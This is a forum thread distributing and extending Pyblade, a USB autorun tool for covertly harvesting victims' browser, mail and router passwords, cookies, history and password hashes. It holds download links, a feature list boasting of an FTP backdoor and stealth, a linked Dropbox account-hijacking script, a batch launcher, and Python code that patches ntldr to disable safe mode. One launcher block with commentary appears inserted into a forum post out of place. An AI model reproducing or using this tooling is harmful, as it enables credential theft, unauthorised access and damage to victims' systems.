Pyblade


sablefoxx

Guest seksi90210

I have not had a chance to check this post in a long while; I've been so busy. Sadly, I see no updates and assume sablefoxx is busy as well. I hope to see this project continued =]


  • 1 month later...
I haven't had much time to develop Py~Blade recently, so here is the current source code. It's got a few bugs, but feel free to hack it up. This isn't an official release, but feel free to post patches or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully).

(Go forth and learn python! http://docs.python.org)

http://dl.dropbox.com/u/341940/pyblade.tar.gz

Edited by sablefoxx

  • 2 weeks later...
  • 1 month later...

@Emptiness:

I don't know how the payload is configured (or built; I haven't checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained that the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ didn't exist. I can only conclude that the payload is made to be run only from the root of a drive (that's what sablefoxx said in his first post, I believe). **If this isn't right, the rest of this part doesn't matter.**

What the U3 shit does is place it somewhere else and make it run from there. If the only reason you guys want it to be U3 is to make it autorunnable, well, fine, here's a solution:

Make a .BAT file that goes to the root of the drive and then runs bex.exe (which is placed in the root of the drive). Then turn that .bat into an .exe (bat-to-exe converter, Google it), then convert the .exe into a .u3p (PackageFactory, once again Google it), then install the .u3p onto your U3 drive.

Going to the root of the drive can generally be done in two ways:

cd..
cd..
cd..
cd..
... (you get the point, I guess)
cd..

or

%~d0

If you have Firefox password stealer problems, just get the newest version from their site.
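A launcher along the lines the post describes, as an added example (not Pyblade's own code and not the poster's .bat). It assumes bex.exe sits at the root of the same drive as the script. Note that %~d0 on its own only expands to the script's drive letter (for example E:), and running "E:" as a command switches to that drive's current directory, which is not guaranteed to be the root; "cd /d" with a trailing backslash goes to the root in one step regardless of where U3 or an autorun handler started the script.

```batch
@echo off
rem Added example launcher; not Pyblade's code or the poster's .bat.
rem %~d0 expands to the drive letter of this script (for example E:).
rem "cd /d" changes drive and directory together, so the working
rem directory becomes the root of that drive no matter where we started.
cd /d %~d0\ || (
    echo Could not change to the root of %~d0 >&2
    exit /b 1
)

rem Assumption: bex.exe lives at the root of the same drive as this script.
if not exist "%~d0\bex.exe" (
    echo bex.exe not found at %~d0\ >&2
    exit /b 1
)

rem Run the blade from the drive root so its relative log paths
rem (for example \logs\...) resolve on this drive.
"%~d0\bex.exe"
exit /b %errorlevel%
```

Save it next to bex.exe, then wrap it with a bat-to-exe converter and PackageFactory as the post describes; the "cd /d" line is what makes the result work even when the U3 launcher starts it with a different working directory.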


  • 2 months later...

I don't know how alive this project still is, but I did some work on it, so I guess I might as well post it... I used the old, stable source from the first post rather than the newest source that sablefoxx dumped. It should have all of the features in the OP, plus the features listed below.

Added features:

- The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor.

- Browser passwords can all be saved in one file, one file per browser, or both.

- Dumps the saved cache for IE, Chrome, and Firefox.

- Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working).

- Dumps the saved history for Chrome and Firefox in addition to IE.

- Dumps passwords saved in popular mail clients.

- Dumps the password to access the victim's router (unfortunately only works on a small set of routers).

- Modified U3 support: the drive now executes FBex without launching the U3 launchpad, making it stealthier.

Known issues:

- PWDump is the only bit of the program that isn't working on 64-bit systems.

- IE Cookie Viewer doesn't save.

I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code; it didn't work. I rewrote it; it didn't work. I don't know what to do. Here's an odd little note, though: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me...

Here is the modified U3 launcher, using Universal Customizer (Windows XP only):

http://www.mediafire.com/?v82c88r8bc68i8y

Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made.

For those of you who can't run the above because you don't have XP, here is the .iso by itself:

http://www.mediafire.com/?m2rc6158y2dxryt

It needs to be burned to the virtual optical drive of your U3 device.

Here is the blade, just extract to the root of the flash drive:

http://www.mediafire.com/?2sogp1cy7lzt824

And finally, here's the source:

http://www.mediafire.com/?z6d4c116i75cn3p

Does anyone know of any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there were a good open source one, that'd be a cool thing to add.

*Phew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx ^_^


  • 3 weeks later...

Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently? It allows you to copy other people's Dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades!

http://ge.tt/8nETsM5?c

And if you're feeling a bit evil, disable safe mode (XP/2k3):

# Python 2.x code (the slice assignment below also works unchanged on Python 3,
# where mmap.write_byte would need an int instead of a one-character string)
import os
import mmap


def patch_ntldr(ntldr='C:\\ntldr'):
    # Open the boot loader read/write in binary mode and map it so the
    # patch is written in place without rewriting the whole file.
    with open(ntldr, 'r+b') as f:
        size = os.path.getsize(ntldr)
        mm = mmap.mmap(f.fileno(), size)
        try:
            # Overwrite three bytes at offset 1915 with NOPs (0x90). NOP sled, whee!
            mm[1915:1918] = b'\x90\x90\x90'
            mm.flush()
        finally:
            mm.close()


if __name__ == '__main__':
    patch_ntldr()

Edited by sablefoxx

  • 4 weeks later...

Mubix posted the link...

http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/

Not bad as a PyBlade add-on!

:rolleyes:

I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So let's say you added this onto Pyblade: your USB would then dump the entire system memory, so if the system had 8 GB of RAM, around 8 GB of data would be dumped onto your USB. For a tool like Pyblade, which is intended to be inserted into a computer and removed quickly, it would add a lot of time depending on the amount of RAM installed in the computer. I'm not saying that this tool is bad; I just think that it was more intended for incident response teams, as they can use DumpIt on their USB without any concern for how long the data will take to copy, as long as they get their memory dump. Maybe DumpIt can be added to the incident response switchblade. Although this could very well change with USB 3.0 becoming mainstream, as we could dump the memory a lot faster. But for now I would recommend DumpIt for incident response tool/USB kits.

That's my 2 cents anyway :lol:


  • 5 months later...
  • 2 months later...

Hello,

This is a great piece of software. Kudos.

I have a question somewhat related to the software, but also to Windows 7.

If a user does not have admin access on a computer running Windows 7 64-bit, will they be able to run this off of a USB drive?


  • 2 weeks later...
  • 1 year later...
